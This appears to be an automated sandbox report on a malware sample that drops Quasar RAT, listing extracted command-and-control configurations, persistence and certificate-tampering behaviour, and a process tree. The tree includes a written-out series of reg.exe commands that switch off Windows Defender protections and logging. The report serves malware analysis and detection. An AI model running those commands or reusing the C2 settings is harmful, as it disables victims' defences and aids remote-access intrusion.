Analysis
-
max time kernel
4294191s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20220223-en -
submitted
10-03-2022 18:45
Static task
static1
Behavioral task
behavioral1
Sample
50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe
Resource
win7-20220223-en
Behavioral task
behavioral2
Sample
50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe
Resource
win10v2004-en-20220112
General
-
Target
50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe
-
Size
9.4MB
-
MD5
456b54d87d22a2c59cb44ae3e29940a3
-
SHA1
4eb16df152f774f3794a6ca8c1cd1a3e72bc7232
-
SHA256
50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6
-
SHA512
8213a726aeee1519599e6884f6ad4564d5df066251267d630af4e601bef2b726a2445855e0a609f088c26c84b4cae69e26cc3d744668bf882ff46cb29684cc6d
Malware Config
Extracted
quasar
2.1.0.0
Windows Security Notification
minecraftgaming009-61323.portmap.io:61323
VNM_MUTEX_c2q7y2ayYutZ2XaYe7
-
encryption_key
1oSvdU99XhcwnNYl3rB8
-
install_name
Windows Security Notification.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Security Notification
-
subdirectory
SubDir
Extracted
quasar
1.4.0.0
Steam
Minecrafthosting6969-35389.portmap.io:35389
EAojkiVMQ0sDtyACyi
-
encryption_key
P5xHRD8P5ncR2T1uRpgp
-
install_name
Steam.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Steam
-
subdirectory
SubDir
Signatures
-
Contains code to disable Windows Defender 13 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/files/0x0007000000013990-75.dat disable_win_def behavioral1/files/0x0007000000013990-76.dat disable_win_def behavioral1/memory/300-80-0x0000000000180000-0x0000000000216000-memory.dmp disable_win_def behavioral1/files/0x0006000000014145-104.dat disable_win_def behavioral1/files/0x0006000000014145-106.dat disable_win_def behavioral1/files/0x0006000000014145-108.dat disable_win_def behavioral1/memory/1924-110-0x0000000000990000-0x0000000000A26000-memory.dmp disable_win_def behavioral1/files/0x0006000000014145-130.dat disable_win_def behavioral1/files/0x0006000000014145-129.dat disable_win_def behavioral1/files/0x0006000000014145-128.dat disable_win_def behavioral1/files/0x0006000000014145-127.dat disable_win_def behavioral1/files/0x0006000000014145-131.dat disable_win_def behavioral1/memory/2008-164-0x0000000000BE0000-0x0000000000C76000-memory.dmp disable_win_def -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Quasar Payload 14 IoCs
resource yara_rule behavioral1/files/0x0007000000013990-75.dat family_quasar behavioral1/files/0x0007000000013990-76.dat family_quasar behavioral1/memory/1484-77-0x00000000011C0000-0x000000000122A000-memory.dmp family_quasar behavioral1/memory/300-80-0x0000000000180000-0x0000000000216000-memory.dmp family_quasar behavioral1/files/0x0006000000014145-104.dat family_quasar behavioral1/files/0x0006000000014145-106.dat family_quasar behavioral1/files/0x0006000000014145-108.dat family_quasar behavioral1/memory/1924-110-0x0000000000990000-0x0000000000A26000-memory.dmp family_quasar behavioral1/files/0x0006000000014145-130.dat family_quasar behavioral1/files/0x0006000000014145-129.dat family_quasar behavioral1/files/0x0006000000014145-128.dat family_quasar behavioral1/files/0x0006000000014145-127.dat family_quasar behavioral1/files/0x0006000000014145-131.dat family_quasar behavioral1/memory/2008-164-0x0000000000BE0000-0x0000000000C76000-memory.dmp family_quasar -
description flow ioc Process File opened for modification C:\Windows\system32\GDIPFONTCACHEV1.DAT 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 4 ip-api.com Process not Found 18 api64.ipify.org Process not Found 19 api64.ipify.org Process not Found -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/1240-116-0x000000001B2B0000-0x000000001B5F2000-memory.dmp WebBrowserPassView -
Nirsoft 2 IoCs
resource yara_rule behavioral1/memory/1240-116-0x000000001B2B0000-0x000000001B5F2000-memory.dmp Nirsoft behavioral1/files/0x0006000000014350-145.dat Nirsoft -
Executes dropped EXE 10 IoCs
pid Process 652 Abxy.exe 296 Ygri.exe 1620 Abxy.exe 572 Eseycozeqlmrj.exe 1484 Ivyptgekvxzzxq.exe 300 Zutrnxofihoxqy.exe 1060 Steam.exe 1924 Windows Security Notification.exe 1240 RtkBtManServ.exe 2008 Zutrnxofihoxqy.exe -
Deletes itself 1 IoCs
pid Process 1340 cmd.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager6796520.exe Ygri.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager6796520.exe Ygri.exe -
Loads dropped DLL 22 IoCs
pid Process 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 1512 Process not Found 652 Abxy.exe 1620 Abxy.exe 1620 Abxy.exe 1620 Abxy.exe 1620 Abxy.exe 1620 Abxy.exe 1620 Abxy.exe 300 Zutrnxofihoxqy.exe 296 Ygri.exe 1376 WerFault.exe 1376 WerFault.exe 1376 WerFault.exe 1376 WerFault.exe 1376 WerFault.exe 828 WerFault.exe 828 WerFault.exe 828 WerFault.exe 828 WerFault.exe 828 WerFault.exe 1520 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features Zutrnxofihoxqy.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" Zutrnxofihoxqy.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Ivyptgekvxzzxq.exe\"" Ivyptgekvxzzxq.exe Set value (str) \REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security Notification = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Zutrnxofihoxqy.exe\"" Zutrnxofihoxqy.exe Set value (str) \REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "\"C:\\Users\\Admin\\AppData\\Roaming\\SubDir\\Steam.exe\"" Steam.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com 18 api64.ipify.org 19 api64.ipify.org -
Drops file in System32 directory 5 IoCs
description ioc Process File created C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe Zutrnxofihoxqy.exe File opened for modification C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe Zutrnxofihoxqy.exe File opened for modification C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe Windows Security Notification.exe File opened for modification C:\Windows\SysWOW64\SubDir Windows Security Notification.exe File created C:\Windows\SysWOW64\SubDir\r77-x64.dll Zutrnxofihoxqy.exe -
Detects Pyinstaller 6 IoCs
resource yara_rule behavioral1/files/0x00090000000122ff-57.dat pyinstaller behavioral1/files/0x00090000000122ff-58.dat pyinstaller behavioral1/files/0x00090000000122ff-59.dat pyinstaller behavioral1/files/0x00090000000122ff-61.dat pyinstaller behavioral1/files/0x00090000000122ff-64.dat pyinstaller behavioral1/files/0x00090000000122ff-63.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 1376 572 WerFault.exe 30 828 1924 WerFault.exe 43 -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 908 schtasks.exe 840 schtasks.exe 1908 schtasks.exe 632 schtasks.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 RtkBtManServ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e RtkBtManServ.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e RtkBtManServ.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Zutrnxofihoxqy.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Zutrnxofihoxqy.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 1508 PING.EXE 964 PING.EXE -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 572 Eseycozeqlmrj.exe 964 powershell.exe 300 Zutrnxofihoxqy.exe 300 Zutrnxofihoxqy.exe 300 Zutrnxofihoxqy.exe 300 Zutrnxofihoxqy.exe 300 Zutrnxofihoxqy.exe 300 Zutrnxofihoxqy.exe 300 Zutrnxofihoxqy.exe 2008 Zutrnxofihoxqy.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 572 Eseycozeqlmrj.exe Token: SeDebugPrivilege 1484 Ivyptgekvxzzxq.exe Token: SeDebugPrivilege 300 Zutrnxofihoxqy.exe Token: SeDebugPrivilege 1060 Steam.exe Token: SeDebugPrivilege 1924 Windows Security Notification.exe Token: SeDebugPrivilege 1924 Windows Security Notification.exe Token: SeDebugPrivilege 1240 RtkBtManServ.exe Token: SeDebugPrivilege 964 powershell.exe Token: SeDebugPrivilege 2008 Zutrnxofihoxqy.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1924 Windows Security Notification.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1924 wrote to memory of 652 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 27 PID 1924 wrote to memory of 652 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 27 PID 1924 wrote to memory of 652 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 27 PID 1924 wrote to memory of 296 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 29 PID 1924 wrote to memory of 296 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 29 PID 1924 wrote to memory of 296 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 29 PID 1924 wrote to memory of 296 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 29 PID 1924 wrote to memory of 572 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 30 PID 1924 wrote to memory of 572 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 30 PID 1924 wrote to memory of 572 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 30 PID 1924 wrote to memory of 572 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 30 PID 652 wrote to memory of 1620 652 Abxy.exe 31 PID 652 wrote to memory of 1620 652 Abxy.exe 31 PID 652 wrote to memory of 1620 652 Abxy.exe 31 PID 1924 wrote to memory of 1484 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 32 PID 1924 wrote to memory of 1484 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 32 PID 1924 wrote to memory of 1484 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 32 PID 1924 wrote to memory of 300 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 33 PID 1924 wrote to memory of 300 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 33 PID 1924 wrote to memory of 300 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 33 PID 1924 wrote to memory of 300 1924 50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe 33 PID 1484 wrote to memory of 908 1484 Ivyptgekvxzzxq.exe 35 PID 1484 wrote to memory of 908 1484 Ivyptgekvxzzxq.exe 35 PID 1484 wrote to memory of 908 1484 Ivyptgekvxzzxq.exe 35 PID 300 wrote to memory of 840 300 Zutrnxofihoxqy.exe 37 PID 300 wrote to memory of 840 300 Zutrnxofihoxqy.exe 37 PID 300 wrote to memory of 840 300 Zutrnxofihoxqy.exe 37 PID 300 wrote to memory of 840 300 Zutrnxofihoxqy.exe 37 PID 1484 wrote to memory of 1060 1484 Ivyptgekvxzzxq.exe 39 PID 1484 wrote to memory of 1060 1484 Ivyptgekvxzzxq.exe 39 PID 1484 wrote to memory of 1060 1484 Ivyptgekvxzzxq.exe 39 PID 1060 wrote to memory of 1908 1060 Steam.exe 40 PID 1060 wrote to memory of 1908 1060 Steam.exe 40 PID 1060 wrote to memory of 1908 1060 Steam.exe 40 PID 300 wrote to memory of 1924 300 Zutrnxofihoxqy.exe 43 PID 300 wrote to memory of 1924 300 Zutrnxofihoxqy.exe 43 PID 300 wrote to memory of 1924 300 Zutrnxofihoxqy.exe 43 PID 300 wrote to memory of 1924 300 Zutrnxofihoxqy.exe 43 PID 296 wrote to memory of 1240 296 Ygri.exe 42 PID 296 wrote to memory of 1240 296 Ygri.exe 42 PID 296 wrote to memory of 1240 296 Ygri.exe 42 PID 296 wrote to memory of 1240 296 Ygri.exe 42 PID 300 wrote to memory of 964 300 Zutrnxofihoxqy.exe 44 PID 300 wrote to memory of 964 300 Zutrnxofihoxqy.exe 44 PID 300 wrote to memory of 964 300 Zutrnxofihoxqy.exe 44 PID 300 wrote to memory of 964 300 Zutrnxofihoxqy.exe 44 PID 296 wrote to memory of 528 296 Ygri.exe 46 PID 296 wrote to memory of 528 296 Ygri.exe 46 PID 296 wrote to memory of 528 296 Ygri.exe 46 PID 296 wrote to memory of 528 296 Ygri.exe 46 PID 572 wrote to memory of 1376 572 Eseycozeqlmrj.exe 48 PID 572 wrote to memory of 1376 572 Eseycozeqlmrj.exe 48 PID 572 wrote to memory of 1376 572 Eseycozeqlmrj.exe 48 PID 572 wrote to memory of 1376 572 Eseycozeqlmrj.exe 48 PID 1924 wrote to memory of 632 1924 Windows Security Notification.exe 49 PID 1924 wrote to memory of 632 1924 Windows Security Notification.exe 49 PID 1924 wrote to memory of 632 1924 Windows Security Notification.exe 49 PID 1924 wrote to memory of 632 1924 Windows Security Notification.exe 49 PID 528 wrote to memory of 1888 528 cmd.exe 51 PID 528 wrote to memory of 1888 528 cmd.exe 51 PID 528 wrote to memory of 1888 528 cmd.exe 51 PID 528 wrote to memory of 1888 528 cmd.exe 51 PID 528 wrote to memory of 1280 528 cmd.exe 52 PID 528 wrote to memory of 1280 528 cmd.exe 52
Processes
-
C:\Users\Admin\AppData\Local\Temp\50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe"C:\Users\Admin\AppData\Local\Temp\50a1c7fe95af7c0af2cc5c21c62faf10e63f4076004e8508b608385aad5be3b6.exe"1⤵
- Quasar RAT
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Users\Admin\AppData\Local\Temp\Abxy.exe"C:\Users\Admin\AppData\Local\Temp\Abxy.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Users\Admin\AppData\Local\Temp\Abxy.exe"C:\Users\Admin\AppData\Local\Temp\Abxy.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\Ygri.exe"C:\Users\Admin\AppData\Local\Temp\Ygri.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:296 -
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4EpeebWszwq3L5jgvisNmyvGbyVAfjjb/WhkVRHM1jSY9bDQBPQUlA+KOt+q65oQzJt9yxASNarn9KPWpl7VpeJNaoB2sh/pMWGpfd1hNghc5haR0kkZkRiX8yULrHRxs=3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1240 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵PID:652
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵PID:1976
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵PID:1508
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵PID:1148
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:1888
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵PID:1280
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵PID:1528
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵PID:1644
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵PID:784
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵PID:1904
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵PID:1700
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵PID:1988
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵PID:1308
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵PID:748
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤4⤵PID:1508
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵PID:1212
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵PID:1304
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:1532
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:332
-
-
